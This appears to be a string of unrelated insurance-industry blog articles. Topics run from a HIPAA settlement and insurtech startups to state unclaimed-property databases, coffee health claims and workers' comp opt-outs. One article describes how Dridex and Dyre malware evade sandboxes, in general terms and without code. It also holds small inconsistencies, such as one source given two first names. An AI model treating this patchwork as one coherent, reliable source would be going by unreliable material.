Health plans, insurers and other health plan industry service providers need to ensure that their Internet applications properly safeguard protected health information (PHI), based on a recent warning from Department of Health and Human Services (HHS) Office of Civil Rights (OCR). The warning comes in a resolution agreement with St. Elizabeth’s Medical Center (SEMC) that settles OCR charges that it breached the Health Insurance Portability and Accountability Act (HIPAA) by failing to protect the security of personal health data when using Internet applications. The agreement shows how complaints filed with OCR by workforce members can create additional compliance headaches for covered entities or their business associates. With recent reports on massive health plan and other data breaches fueling widespread regulatory concern, covered entities and their business associates should prepare to defend the adequacy of their own HIPAA and other health data security practices. Accordingly, health plans and their employer or other sponsors, health plan fiduciaries, health plan vendors acting as business associates and others dealing with health plans and their management should contact legal counsel experienced in these matters for advice within the scope of attorney-client privilege about how to respond to the OCR warning and other developments to manage their HIPAA and other privacy and data security legal and operational risks and liabilities. SEMC Resolution Agreement Overview The SEMC resolution agreement settles OCR charges that SEMC violated HIPAA. The charges stem from an OCR investigation of a Nov. 16, 2012, complaint by SEMC workforce members and a separate data breach report that SEMC made to OCR of a breach of unsecured electronic PHI (ePHI). The information was stored on a former SEMC workforce member’s personal laptop and USB flash drive, and 595 individuals were affected. In their complaint, SEMC workers complained that SEMC violated HIPAA by allowing workforce members to use an Internet-based document application to share and store documents containing electronic protected health information (ePHI) of at least 498 individuals without adequately analyzing the risks. OCR says its investigation of the complaint and breach report revealed among other things that:

• SEMC improperly disclosed the PHI of at least 1,093 individuals;
• SEMC failed to implement sufficient security measures regarding the transmission of and storage of ePHI to reduce risks and vulnerabilities to a reasonable and appropriate level; and
• SEMC failed to identify and respond to a known security incident, mitigate the harmful effects of the security incident and document the security incident and its outcome in a timely manner.

To resolve OCR’s charges, SMCS agreed to pay $218,400 to OCR and implement a “robust corrective action plan.” Although the required settlement payment is relatively small, the resolution agreement merits attention because of its focus on security requirements for Internet application and data use and sharing activities engaged in by virtually every covered entity and business associate. HIPAA-Specific Compliance Lessons OCR Director Jocelyn Samuels said covered entities and their business associates must “pay particular attention to HIPAA’s requirements when using Internet-based document sharing applications.” She stated that, “to reduce potential risks and vulnerabilities, all workforce members must follow all policies and procedures, and entities must ensure that incidents are reported and mitigated in a timely manner.” The resolution agreement makes clear that OCR expects health plans and other covered entities and their business associates to be able to show both their timely investigation of reported or suspected HIPAA susceptibilities or violations as well as to self-audit and spot test HIPAA compliance in their operations. The SEMC corrective action plan also indicates covered entities and business associates must be able to produce evidence showing a top-to-bottom dedication to HIPAA, to prove that a “culture of compliance” permeates their organizations. Covered entities and business associates should start by considering the advisability for their own organization to take one or more of the steps outlined in the “robust corrective action plan,” starting with the specific steps that SEMC must take:

• Conducting self-audits and spot checks of workforce members’ familiarity and compliance with HIPAA policies and procedures on transmitting ePHI using unauthorized networks; storing ePHI on unauthorized information systems, including unsecured networks and devices; removal of ePHI from SEMC; prohibition on sharing accounts and passwords for ePHI access or storage; encryption of portable devices that access or store ePHI; security incident reporting related to ePHI; and
• Inspecting laptops, smartphones, storage media and other portable devices, workstations and other devices containing ePHI and other data devices and systems and their use; and
• Conducting other tests and audits of security and compliance with policies, processes and procedures; and
• Documenting results, findings, and corrective actions including appropriate up-the-ladder reporting and management oversight of these and other HIPAA compliance expectations, training and other efforts.

Broader HIPAA Compliance and Risk Management Lessons Covered entities and their business associates also should be mindful of more subtle, but equally important, broader HIPAA compliance and risk management lessons. One of the most significant of these lessons is the need for proper workforce training, oversight and management. The resolution agreement sends an undeniable message that OCR expects covered entities, business associates and their leaders to be able to show their effective oversight and management of the operational compliance of their systems and members of their workforce with HIPAA policies. The resolution agreement also provides insights to the internal corporate processes and documentation of compliance efforts that covered entities and business associates may need to show their organization has the required “culture of compliance.” Particularly notable are terms on documentation and up-the-ladder reporting. Like tips shared by HHS in the recently released Practical Guidance for Health Care Governing Boards on Compliance Oversight, these details provide invaluable tips. Risks and Responsibilities of Employers and Their Leaders While HIPAA places the primary duty for complying with HIPAA on covered entities and business associates, health plan sponsors and their management still need to make HIPAA compliance a priority for many practical and legal reasons. HIPAA data breach or other compliance reports often trigger significant financial, administrative, workforce satisfaction and other operational costs for employer health plan sponsors. Inevitable employee concern about health plan data breaches undermines employee value and satisfaction. These concerns usually require employers to expend significant management and financial resources to respond. The costs of investigation and redress of a known or suspected HIPAA data or other breach typically far exceed the actual damages to participants resulting from the breach. While HIPAA technically does not make sponsoring employers directly responsible for these duties or the costs of their performance, as a practical matter sponsoring employers typically can expect to pay costs and other expenses that its health plan incurs to investigate and redress a HIPAA breach. For one thing, except in the all-too-rare circumstances where employers as plan sponsors have specifically negotiated more favorable indemnification and liability provisions in their vendor contracts, employer and other health plan sponsors usually agree in their health plan vendor contracts to pay the expenses and to indemnify health plan insurers, third party administrators and other vendors for costs and liabilities arising from HIPAA breaches or other events arising in the course of the administration of the health plan. Because employers typically are obligated to pay health plan costs in excess of participant contributions, employers also typically would be required to provide the funding their health plan needs to cover these costs even in the absence of such indemnification agreements. Sponsoring employers and their management also should be aware that the employer’s exception from direct liability for HIPAA compliance does not fully insulate the employer or its management from legal risks in the event of a health plan data breach or other HIPAA violation. While HIPAA generally limits direct responsibility for compliance with the HIPAA rules to a health plan or other covered entity and their business associates, HIPAA hybrid entity and other organizational rules and criminal provisions of HIPAA, as well as various other federal laws, arguably could create liability risks for the employer. See, e.g., Cyber Liability, Healthcare: Healthcare Breaches: How to Respond; Restated HIPAA Regulations Require Health Plans to Tighten Privacy Policies and Practices; Cybercrime and Identity Theft: Health Information Security Beyond. For example, hybrid entity and other organizational provisions in the HIPAA rules generally require employers and their health plan to ensure that health plan operations are appropriately distinguished from other employer operations for otherwise non-covered human resources, accounting or other employer activities to avoid subjecting their otherwise non-covered employer operations and data to HIPAA Rules. To achieve this required designation and separation, the HIPAA rules typically also require that the health plan include specific HIPAA language and the employer and health plan take appropriate steps to designate and separate health plan records and data, workforces and operations from the non-covered business operations and records of the sponsoring employer. Failure to fulfill these requirements could result in the unintended spread of HIPAA restrictions and liabilities to other aspects of the employer’s human resources or other operations. Sponsoring employers will want to confirm that health plan and other operations and workforces are properly designated, distinguished and separated to reduce this risk. When putting these designations and separations in place, employers also generally will want to make arrangements to ensure that their health plan includes the necessary terms and that the employer implements the policies necessary for the employer to provide the certifications to the health plan that HIPAA will require that the health plan receive before HIPAA will allow health plan PHI to be disclosed to the employer or its representative for the limited underwriting and other specified plan administration purposes permitted by the HIPAA rules. Once these arrangements are in place, employers and their management also generally will want to take steps to minimize the risk that their organization or a member of the employer’s workforce honors these arrangements and does not improperly access or use health plan PHI systems in violation of these conditions or other HIPAA rules. This or other wrongful use or access of health plan PHI or systems could violate criminal provisions of HIPAA or other federal laws making it a crime for any person – including the employer or a member of its workforce – to wrongfully access health plan PHI, electronic records or systems. Because  health plan PHI records also typically include personal tax, Social Security information that the Internal Revenue Code, the Social Security Act and other federal laws generally would require the employer to keep confidential and to protect against improper use, employers and their management also generally should be concerned about potential exposures for their organization that could result from improper use or access of this information in violation of these other federal laws. Because HIPAA and some of these other laws under certain conditions make it a felony to violate these rules, employer and their management generally will want to treat compliance with these federal rules as critical elements of the employer’s federal sentencing guideline and other compliance programs. Employers or members of their management also may have an incentive to promote health plan compliance with HIPAA or other health plan privacy or data security requirements. For instance, health plan sponsors and management involved in health plan decisions, administration or oversight could face personal fiduciary liability risks under ERISA for failing to act prudently to ensure health plan compliance with HIPAA and other federal privacy and data security requirements.. ERISA’s broad functional fiduciary definition encompasses both persons and entities appointed as “named” fiduciaries and others who functionally exercise discretion or control over a plan or its administration. This fiduciary status and risk can occur even if the entity or individual is not named a named fiduciary, expressly disclaims fiduciary responsibility or does not realize it bears fiduciary status or responsibility. Because fiduciaries generally bear personal liability for their own breaches of fiduciary duty as well as potential co-fiduciary liability for fiduciary breaches committed by others that they knew or prudently should have known, most employers and members of their management will make HIPAA health plan compliance a priority. Furthermore, most employers and their management also will appreciate the desirability of taking reasonable steps to manage potential exposures that the employer or members of its management could face if their health plan or the employer violates the anti-retaliation rules of HIPAA or other laws through the adoption and administration of appropriate human resources, internal investigation and reporting, risk management policies and practices. See Employee & Other Whistleblower Complaints Common Source of HIPAA Privacy & Other Complaints. Manage HIPAA and Related Risks At minimum, health plans and their business associates should move quickly to conduct a documented assessment of the adequacy of their health plan internet applications and other HIPAA compliance in light of the Resolution Agreement and other developments. Given the scope and diversity of the legal responsibilities, risks and exposures associated with this analysis, most health plan sponsors, fiduciaries, business associates and their management also will want to consider taking other steps to mitigate various other legal and operational risks that lax protection or use of health plan PHI or systems could create for their health plan, its sponsors, fiduciaries, business associates and their management. Health plan fiduciaries, sponsors and business associates and their leaders also generally will want to explore options to use indemnification agreements, liability insurance or other risk management tools as a stopgap against the costs of investigation or defense of a HIPAA security or other data breach.

The Guardian carried a story by Sarah Boseley about the controversy in Europe and other countries about the effectiveness and safety of mammograms. It seems some of the early studies on the issue were deeply flawed. The article says, “Internationally renowned cancer experts have cast fresh doubt on the benefits of breast cancer screening programs, warning that they save fewer lives than previously thought.” Professor Julietta Patnick says, “There are potential risks as well as benefits associated with breast screening, including over-diagnosis, and it is important that women are given information that is clear and accessible before they go for a mammogram.” She calls for women to have truly informed consent so they can decide to have a mammogram or not. This is a controversial area. Should employers be involved in promoting this and prostate screenings? I’m not so sure.

[embed]https://soundcloud.com/insurance-thought-leader/capgemini-salesforce-insurance-thought-leadership-3[/embed] ITL Editor-in-Chief Paul Carroll recently hosted a webinar on "Captivating Customers With All-Channel Experiences,” featuring experts from Capgemini and Salesforce.com and the former chief customer experience officer at AIG. To view or listen to the webinar, click here. For the slides, click here.  In almost all cases, to provide experiences that captivate customers, insurers must modify their legacy technology infrastructure. Some insurers are building an overlay, taking an innovative approach to the technology that customers touch, but that isn’t enough. Insurers need to take a broader look and make sure that new customer technology integrates effectively with back-end systems such as claims, policy administration, billing and enterprise resources planning (ERP). That way, all parts of the enterprise are driving toward providing the desired customer experience. These changes will make agents more satisfied and efficient. The changes will also help captivate customers, who want to deal with all parts of the insurance process as one seamless operation. That means both upgrading the technology for agents and incorporating them tightly into the insurer’s systems. Cloud solutions have proven to deliver capabilities insurers need faster and with less business disruption than traditional, on-premises alternatives. The result is lower total cost of ownership and significantly reduced project risk. Such an approach lets insurers remain firmly focused on the customer. Insurers can focus on designing the customer journey and experience rather than be burdened by the design, build, test and deployment of the technology. To get there from here, insurers need to integrate the interactions among employees, customers and agents and among social networks, internal systems and business processes. The result needs to support any device, use unified business logic and provide access to data. There needs to be a consistent customer experience across all channels (self-service, agents and call centers). Exhibit 3 provides a sample of the necessary components (in this case, on a Salesforce platform):

• Customer Interaction Hub, which provides ease of use and information accessibility
• Platform, which provides multi-device capabilities
• Service Cloud, which helps agents track the history of customers and policies and engage regularly with customers
• A cloud-based contact center telephony system. The system (in this case, Odigo) must provide services such as intelligent call routing, natural language recognition, mobile channel integration, biometrics or voice-based authentication, multi-site routing and management dashboards. The platform must allow customers to originate a transaction in one channel and take it forward in another, such as self-service.
• Document signature software, to allow customers to sign quotes and policies online
• Integration with popular insurance software packages for policy quotes, binding, claims

  When developing for a multi-channel experience, it’s crucial to do lots of A/B testing – changing one variable at a time for a sample of customers, seeing how they react and incorporating those changes that produce better results. It’s also important to actually watch customers to see how they navigate a process – where they stop, where they start up again, where they get sidetracked, where they get confused. We’ve watched customers many times, and the results can be surprising enough to at least require considerable tinkering. For example, with three releases each year, Salesforce has delivered 47 major releases since its inception. Each release is informed by learning from how users behave, adopt and use Salesforce’s features. As a result, more than 1,700 features have been sourced directly from Salesforce’s customer community. In insurance, Salesforce learns from more than 2,500 insurance customers. These continuing improvements happen in an agile fashion, and follow an iterative cycle of release, learn and improve. The race to become a leading insurer that is able to attract, satisfy and retain customers is in full motion. Those insurers that can blend traditional channels and digital channels in a seamless way will lead the race, creating clear competitive advantage with the capabilities in place to capitalize on market disruption over the coming years. The first two articles in this series are here and here. For the white paper from which these articles are adapted, click here.

When training analysts how to deliver more value, two topics have proved the most popular. One is training in Socratic questioning techniques, to get to the real business need. But, as many analysts have "fallen into" this line of work, rather than making a conscious education and career choice, few have been trained in methodologies. With the exponential growth of insight analysts, marketing analysts and data scientists, the emphasis appears to be on just coding skills and software mastery. Where this is the case, too often analysis is an unplanned art, with unreliable timescales and too many "rabbit warrens" being explored. It is perhaps for this reason that the other most popular topic is a high-level structure for analysis. I call this approach the 9-step model for analysis. It comprises the following steps: 1. Socratic Questioning: getting to real business need 2. Planning & Design: defining approach and gathering resources 3. Stakeholder Buy-In: getting agreement on what will be delivered 4. Data: ensuring the needed quality data and learning from it 5. Analysis: including exploratory data analysis and hypothesis testing 6. Insight Generation: converging evidence to get to deeper insights 7. Stakeholder Sign-Off: support for or refining recommendations 8. Storytelling & Visualization: capturing hearts and minds for action 9. Influencing for Action: ensuring appropriate action is taken What's your experience of improving the capability of your customer insight team? Have you focused on developing the skills outlined above or other areas? Please do share your tips, too.

A new breed of financially focused malware has cropped up, using new tactics to evade detection and infect harder-to-compromise systems. The Dyre botnet has successfully compromised tens of thousands of victims in North America. Another banking trojan, Dridex, has successfully compromised thousands of systems in Europe and is increasingly targeting companies and users in the U.S. by sending Word documents carrying malicious macro scripts capable of installing the malware. Security & Privacy News Roundup: Stay informed of key patterns and trends Cloud-based security provider Proofpoint has focused on Dridex since it appeared late last year, tracking efforts by the groups to target companies with Dridex-laden spam. The attackers send out waves of spam every two or three days, using anywhere from two different e-mail templates to more than 1,000, depending on the group behind the attack. The attacks usually last no longer than five hours, and few, if any, antivirus scanners detect the malware in time, says Wayne Huang, vice president of engineering at Proofpoint. “I would say that they are persistent, but they are not APT (an advanced persistent threat) in that they are not focusing on certain organizations,” he says. “They spread malware primarily to monetize.” The rapidly changing templates and the use of macros within Word documents are just two of the techniques that Dridex uses to be an efficient infector. More recent versions of the banking malware have used images to track the number of downloads, and the developers also have added features to foil detection and analysis by automated systems. A number of anti-malware systems open suspicious files or run potentially questionable code in a virtual environment to check for malicious behavior. Yet, attackers have found ways to detect whether their code is running in such a “sandbox.” Initial attempts, for example, would just sleep for an hour or a day, because automated systems typically only executed the code for a few minutes. Most current efforts, however, focus on the anomalies in the system in which the program is running. The developers behind the Dyre malware, for example, used a simple command to count the number of cores being used. Many virtual environments only use a single core for efficency, while multi-core systems are now ubiquitous. Dridex, however, took a simpler tack: Because analysis systems tend to open the suspicious file and wait for any anomalous activity, Dridex is programmed to only execute when the malicious Word document is closed. The evolution of Dridex has made it an effective vehicle for attacks, says Matt Huang, vice president of product management at Proofpoint. “They have been really mutating their techniques, especially to avoid sandbox detection,” he says. “From very early on, they would change e-mail subjects and file titles. Now, we see a greater variety of techniques.” A single attack often will result in hundreds of thousands of e-mails being sent out. The attackers have at least 1.3 billion e-mail addresses from which to choose, Huang says. The attackers also are beginning to zero in on other financial targets, such as cryptocurrencies. In some cases, Dridex has downloaded a trojan known as Pony that can steal more than 30 different cryptocurrencies, such as Bitcoin, from a dozen different types of digital wallets. “Recently, they have been using Pony to steal wallets, because the use of virtual currency has picked up,” Huang says. “They have been quite successful.”

Migrating the technology infrastructure supporting insurance underwriting to “digital” has substantially different meanings depending on who has the floor. For some insurers, it is simply the ability to put a product on the web and offer on-line quotes to prospective policyholders. For others, it is the ability to quote, bind and issue a policy on line. The more sophisticated platforms offer a complete digital marketplace for consumers to shop, obtain pricing, buy, bind, pay for and have policies delivered for a variety of products, offered by multiple carriers, into a secure web-based account, using familiar, digital, “shopping cart” tools and techniques. Still, many carriers need to examine their current systems, which were not built for speed to market or a high degree of automation. The issue for many carriers attempting to go digital is the burden of having web-based sales integrate seamlessly with their legacy systems. I’ve had numerous conversations with executives who bemoan the fact that they can’t offer a product in a different channel because the systems “can’t handle it.” So, carriers are turning away business (and doing their customers a disservice). The Achilles heel for most insurers is that insurance product systems design theory of the '80s and '90s was component-based. It made sense at the time, but it doesn’t any more. The typical carrier legacy system configuration involves a different systems component for practically every function along the product continuum, starting with account acquisition and continuing through agent licensing, underwriting, compliance, rating, quoting, binding, policy issue, premium collection, commission administration and claims payment and ending with financial reporting. Along the way, account data is input into each separate system (sometimes manually, sometimes automatically), resulting in multiple silos of redundant account data. How many employees do you have going through a monthly reconciliation process just to determine you are not double counting business? Wouldn’t it be great if those employees were helping to generate revenue, not figure out if the revenue you think you have is actually revenue? Component-based systems are further complicated because they are often programmed in different languages, come from different vendors, require separate support and maintenance personnel and in many cases rely on programmers who become experts in a very narrow section of the code. (“Don’t ask me about the commission system; I do the billing system.”) The complexity gets compounded with acquisitions of companies that have deployed a similar, component-based approach. Carriers that are serious about a digital transformation need to take a holistic view of the product sales, underwriting and policy administration continuum. Instead of looking at a new component for the underwriting function, a new policy administration system, a new document management system, carriers need to view the entirety of the product process, create a single, relational database and work with a “product agnostic” platform. The ability to put all products on a single system with capabilities to automate underwriting, rating, quoting, binding, policy issue, premium and commission administration is the ideal scenario. Providing access for all users to run all applications from a single system eliminates redundant data entry, programming and maintenance requirements of component-based platforms and enables you and your company to concentrate on the strategic initiatives you’re supposed to focus on.

Insurance is ripe for disruption, and, given the conservative nature of the reigning carriers and large brokers, it is a fair guess that a lot of innovation will come from outside the industry. A few weeks ago, this article touched on how innovation is affecting the financial services industry, but the focus was very much on banking and investing. Today, we aim to expand on this author’s work by focusing on new entrants that are working on disrupting the insurance industry. It is far too early to call who the big winner(s) will be, so we are not yet ready to crown an Uber of insurance, but here are a few of the candidates that we think might be in the winner’s circle when the dust settles: 1. Zenefits: Founded in 2013, this cloud-based HR management company shouldn’t be on a list of companies changing the insurance industry, but it is, because of its innovative approach to selling benefits. According to Forbes, Zenefits was one of the hottest startups in 2014 and look poised for success in 2015. Its focus is on the more than 5 million employers with fewer than 1,000 employees. Zenefits gives the HR software away and makes money on broker commissions for health insurance sold through the software. The benefits industry was blindsided by this model, and Zenefits is facing lawsuits in multiple states but assuming it survives them, it will be in position to upend the traditional way benefits are marketed. The software looks great, and the company claims 10,000 companies with 100,000 employees are already using it. Whether or not Zenefits survives the legal and regulatory onslaught, we love its innovative free-software approach. It’s also interesting that the company started in the Y Combinator startup accelerator. We expect more and more insurance and risk management start-ups to come from start-up accelerators in the next few years as the tech crowd is waking up to the opportunities to disrupt our industry. 2. BizInsure: Founded and owned by San Francisco-based broker Woodruff-Sawyer, BizInsure brought in software from Australia to essentially automate the sales and service process for small commercial insurance. The company started with professional liability and has since expanded to also offer business owner policies (BOPs). The whole business model is based on being able to quote online, buy in seconds and have a declarations page in your inbox in minutes, all while retaining the ability to chat with a licensed agent by phone at any time for either sales or service. The company has been growing slowly by choice, only signing up the carriers that have made their systems completely compatible so there are no manual or overnight batch processes. The company has a decent stable of carriers available, including CNA, Hiscox, Liberty International, Philadelphia and USLI. It looks like BizInsure will now push growth harder, and the question is whether it will be able to hit an exponential growth curve allowing it to disrupt how small business insurance gets sold. 3. MetroMile: The first and thus far only company offering by-the-mile auto insurance in the U.S. Metromile takes a similar approach to Zenefits in that the service is free to everybody, and then the company tries to convert you into a paying customer by offering by-the-mile insurance. Thus far, it's only available in a few states: California, Illinois, Washington and Oregon. But the company is starting to advertise heavily that it can save you money if you drive less than 10,000 miles per year. The free service gives you a free Bluetooth device to install in your car and an app that gives you diagnostics of your vehicle’s performance. For those not ready to fully utilize telematics, this innovative company will still allow you to stay informed about your driving behavior with Metromile Tag., which can track mileage for expenses and driving trends and provide parking location and commute optimization. Another reason the company is a potential disruptor to the industry is because, since January 2015, it has partnered with Uber to offer insurance to drivers, essentially guaranteeing that Uber drivers don’t have a gap in coverage when the Uber policy isn’t covering them. If you think about it, consumers are very used to the pay-for-usage model in other areas, like electricity, water and gas, and MetroMile’s marketing makes the connection explicit. Technically, the company is an agency, not a carrier, and the product is underwritten by National General Insurance Group. 4. Evosure: Currently on invitation-only beta, Evosure’s goal is to reduce the 60% of unwanted quote requests that commercial carriers receive. Evosure simplifes the communication of constantly changing underwriter appetites; a web platform allows brokers to describe the type of risk they have and finds a matching underwriter. The management team has some insurance chops (unlike a lot of other insurance start-ups, which are heavy on tech people): Matt Foran, former director of strategy for Zurich Specialty Products; Brian Wood, former SVP for Marsh & McLennan; and Brett McKenzie, former director of marketing at Fireman’s Fund. We also really love their “Commercial Insurance Is Sexy” T-shirts; we completely agree! 5. Friendsurance (Germany): Combining social networking with personal lines insurance in a very interesting way creating a peer-to-peer (P2P) insurance solution. You create a group of friends needing the same type of insurance and pool your money and insure the pool’s risks with a carrier. If money is left over at the end of the policy period because of good claims experience, you get a refund, or your next term’s premium is cheaper. You never have to pay more than your premium, even if losses are bad because of a stop-loss. Friendsurance works because insuring with friends reduces fraud and results in better risk selection. Small claims are paid from the pool without the expensive process at the carrier, and the pool grows virally without the need to pay a sales force. We really hope that this works and that somebody tries it in the U.S. soon. After all, if you think about it, this would be a natural 21st century extension to the age-old idea of mutual insurance. 6. SocialIntel.com: Getting credit history, driving history and other background information to underwrite personal lines accounts is expensive. What if we could underwrite equally effectively by analyzing a person’s social media posts? It’s kind of a crazy idea, but that’s what SocialIntel.com is selling. If it works, it could be a game changer. The company aims to help carrier underwriters without using expensive data from the usual databases. Our guess is that it wouldn’t work too well for the over-40 crowd, but it probably works great on my generation because we have a tendency of posting everything on social media. The coolest part of it is that the company continually re-evaluates the risk, not just at underwriting, claim and renewal time. 7. Policy Genius: Started by two former McKinsey consultants who were astonished at the backwardness of the insurance industry. They are focused on life and disability insurance and trying to disprove the idea that insurance is “sold and not bought.” They believe that if you educate consumers with the right system, they will buy the right product without a hard sell. Aimed squarely at the Millennial buyer, the friendly insurance checkup takes five minutes and walks you through the different risks in your life. Then it shows you what “People Like You” usually need coverage for and explains why. At the end, you get an insurance to-do list, which recommends the insurance you need in simple language. Interestingly, it points out even home and auto insurance, which, currently, the company doesn’t sell. We really like that the company also tell you what kinds of insurance you don’t need, which builds trust. The company recommended that, at 32 years old, I don't need to buy long-term care yet. If they expand to do all insurance products and do it well, they could become the new way to buy personal lines insurance. One minor thing that’s a turnoff: The company doesn’t currently have an app, so you have to do everything at the website. We are excited to watch these seven companies develop. The insurance industry is ripe for disruption, and innovative ideas that approach opportunities from a different perspective and complement policyholder demographics are bound to put new life in an old business. Comment below: What other companies or products do you have your eye on? This article originally appeared on InsNerds.com.

When it comes to privacy, not all states are alike. This was confirmed yet again in the 50 State Compendium of Unclaimed Property Practices we compiled. The compendium ranks the amount of personal data that state treasuries expose during the process by which individuals can collect unclaimed funds. The data exposed can provide fraudsters with a crime exacta: claiming money that no one will ever miss and gathering various nuggets of personal data that can help facilitate other types of identity theft. The takeaway: Some states provide way too much data to anyone who is in the business of exploiting consumer information. For those who take their privacy seriously, the baseline of our compendium—inclusion in a list of people with unclaimed funds or property—may in itself be unacceptable. For others, finding their name on an unclaimed property list isn’t a huge deal. In fact, two people on our team found unclaimed property in the New York database (I was one of them) while putting together the 50-state compendium, and there were no panic attacks. Free IDT911 white paper: Breach, Privacy and Cyber Coverages: Fact and Fiction That said, there is a reason to feel uncomfortable—or even outright concerned—to find your name on a list of people with unclaimed property. After all, you didn’t give anyone permission to put it there. The way a person manages her affairs (or doesn’t) should not be searchable on a public database like a scarlet letter just waiting to be publicized. Then there’s the more practical reason that it matters. Identity thieves rely on sloppiness. Scams thrive where there is a lack of vigilance (lamentably, a lifestyle choice for many Americans despite the rise of identity-related crimes). The crux of the problem when it comes to reporting unclaimed property: It’s impossible to be guarded and careful about something you don’t even know exists, and, of course, it’s much easier to steal something if you know that it does. The worst of the state unclaimed property databases provide a target-rich environment for thieves interested in grabbing the more than $58 billion in unclaimed funds held by agencies at the state level across the country. States’ response to questions about public database When we asked for comment from the eight states that received the worst rating in our compendium—California, Hawaii, Indiana, Iowa, Nevada, South Dakota, Texas and Wisconsin—five replied. In an effort to continue the dialogue around this all-too-important topic, here are a few of the responses from the states: -- California said: “The California state controller has a fraud detection unit that takes proactive measures to ensure property is returned to the rightful owners. We have no evidence that the limited online information leads to fraud.” The “limited online information” available to the public on the California database provides name, street addresses, the company that held the unclaimed funds and the exact amount owed unless the property is something with a movable valuation like equity or commodities. To give just one example, we found a $50 credit at Tiffany associated with a very public figure. We were able to verify it because the address listed in the California database had been referenced in a New York Times article about the person of interest. Just those data points could be used by a scammer to trick Tiffany or the owner of the unclaimed property (or the owner's representatives) into handing over more information (to be used elsewhere in the commission of fraud) or money (a finder’s fee is a common ruse) or both. This policy seems somewhat at odds with California’s well-earned reputation as one of the most consumer-friendly states in the nation when it comes to data privacy and security. -- Hawaii’s response: “We carefully evaluated the amount and type of information to be provided and consulted with our legal counsel to ensure that no sensitive personal information was being provided.” My response: Define “sensitive.” These days, name, address and email address (reflect upon the millions of these that are “out there” in the wake of the Target and Home Depot breaches) are all scammers need to start exploiting your identity. The more information they have, the more opportunities they can create, leveraging that information, to get more until they have enough to access your available credit or financial accounts. -- Indiana’s response was thoughtful. “By providing the public record, initially we are hoping to eliminate the use of a finder, which can charge up to 10% of the property amount. Providing the claimant the information up front, they are more likely to use our service for free. That being said, we are highly aware of the fraud issue and, as you may know, Indiana is the only state in which the Unclaimed Property Division falls under the Attorney General’s office. This works to our advantage in that we have an entire investigative division in-house and specific to unclaimed property. In addition, we also have a proactive team that works to reach out to rightful owners directly on higher-dollar claims to reduce fraud and to ensure those large dollar amounts are reaching the rightful owners.” Protect and serve should be the goal While Indiana has the right idea, the state still provides too much information. The concept here is to protect and serve—something the current system of unclaimed property databases currently does not do. The methodology used in the compendium was quite simple: The less information a state provided, the better its ranking. Four stars was the best rating—it went to states that provided only a name and city or ZIP code—and one star was the worst, awarded to states that disclosed name, street address, property type, property holder and exact amount owed. In the majority of states in the U.S., the current approach to unclaimed funds doesn’t appear to be calibrated to protect consumers during this ever-growing epidemic of identity theft and cyber fraud. The hit parade of data breaches over the past few years—Target, Home Depot, Sony Pictures, Anthem and, most recently, the Office of Personnel Management—provides a case-by-case view of the evolution of cybercrime. Whether access was achieved by malware embedded in a spear-phishing email or came by way of an intentionally infected vendor, the ingenuity of fraudsters continues apace, and it doesn’t apply solely to mega databases. Identity thieves make a living looking for exploitable mistakes. The 50 State Compendium provides a state-by-state look at mistakes just waiting to be converted by fraudsters into crimes. The best way to keep your name off those lists: Stay on top of your finances, cash your checks and keep tabs on your assets. (And check your credit reports regularly to spot signs of identity fraud. You can get your free credit reports every year from the major credit reporting agencies, and you can get a free credit report summary from Credit.com every month for a more frequent overview.) In the meantime, states need to re-evaluate the best practices for getting unclaimed funds to consumers. One possibility may be to create a search process that can only be initiated by the consumer submitting his name and city (or cities) on a secure government website.

This idea is taken from The Doctor Weighs In post by Dov Michaeli. As the article says, “Coffee drinkers have a reduced risk of dying prematurely from all causes, and consequently live longer.” Coffee is a “vice” that is most worthy, and one to be embraced. Some health attributes of coffee include reduced risks of death from:

• Cardiac arrhythmia
• Type 2 diabetes
• Dementia
• Pneumonia
• Lung disease
• Accidents
• Strokes

That’s quite a list. The good news is that a 50-cent cup of coffee works as well as a five-dollar cup. Any amount of coffee is better than none. According to results of a study by the National Institutes of Health (NIH), “Compared with people who drank no coffee at all, men and women who drank six or more cups per day were 10% and 15% less likely, respectively, to die during the study.” Don’t tell wellness true believers about this. They may want to start charging coffee-free employees a higher health payroll deduction.

This is the third of eight parts. The first article in the series is here. The second article in the series is here. Workers’ compensation is a mysterious realm. Just pick a state. Even those of us who regularly read workers’ compensation statutes, regulations and official government websites have great difficulty triangulating the truth about basic rights and responsibilities for injured workers. The little communication provided to injured workers tends to be oversimplified, leaving them no choice but to hire a lawyer to navigate the system. In fact, armies of trial lawyers, insurance and claims personnel and government employees are needed for basic functions of workers’ compensation systems. These armies then find much to argue over, which drives an endless pursuit of “reforms.” Even the industry’s biggest proponents and thought leaders complain of dysfunction. OSHA has also now joined the chorus claiming that workers’ compensation systems “add inequality to injury” and shift too much cost to injured workers and other government programs. Against this backdrop, we’ve seen the Texas “nonsubscriber option” (often referred to as "opt-out") grow to cover considerably more than one million workers and successfully handle more than 50,000 injury claims a year. A more highly regulated “Oklahoma option” launched in 2014 and has withstood two challenges at the Oklahoma Supreme Court. Statistically credible data demonstrates that better outcomes for employees can be achieved through more deliberate, easy-to-understand communication that supports requirements for employee accountability. Such simple injury management principles have resulted in billions of dollars in employer savings and economic development. Now, both Tennessee and South Carolina are considering option legislation, with several other states wondering if they should do the same. Having worked on legislation and regulatory systems related to option programs for more than 25 years, I can understand the initial confusion and distrust by option opponents. Moving from a hyper-regulated, almost exclusively state-regulated system to a more free-market alternative that relies on a combination of state and federal laws takes people out of their comfort zone. They have legitimate questions that deserve good answers. But too much of the discussion to date has been devoid of any spirit of inquiry. Workers’ compensation carrier associations issue fallacious descriptions of the purpose and mechanics of option programs. Allegations by plaintiff attorneys in lawsuits are quoted by workers’ comp industry media as irrefutable facts. Instead of research, option opponents attempt to promote class warfare while falsely disparaging reputable employers. In the midst of this chaos, only one thing is sure: We are in a period of transition, and the facts will emerge, one way or the other. In-depth information about options to workers’ compensation is more accessible every day. For those who are willing to have a reasoned public policy dialogue and information exchange, a path of progress emerges. For those who prefer uninformed hostility over homework, their true intentions will become more obvious, and their voices will be less credible as the days go by.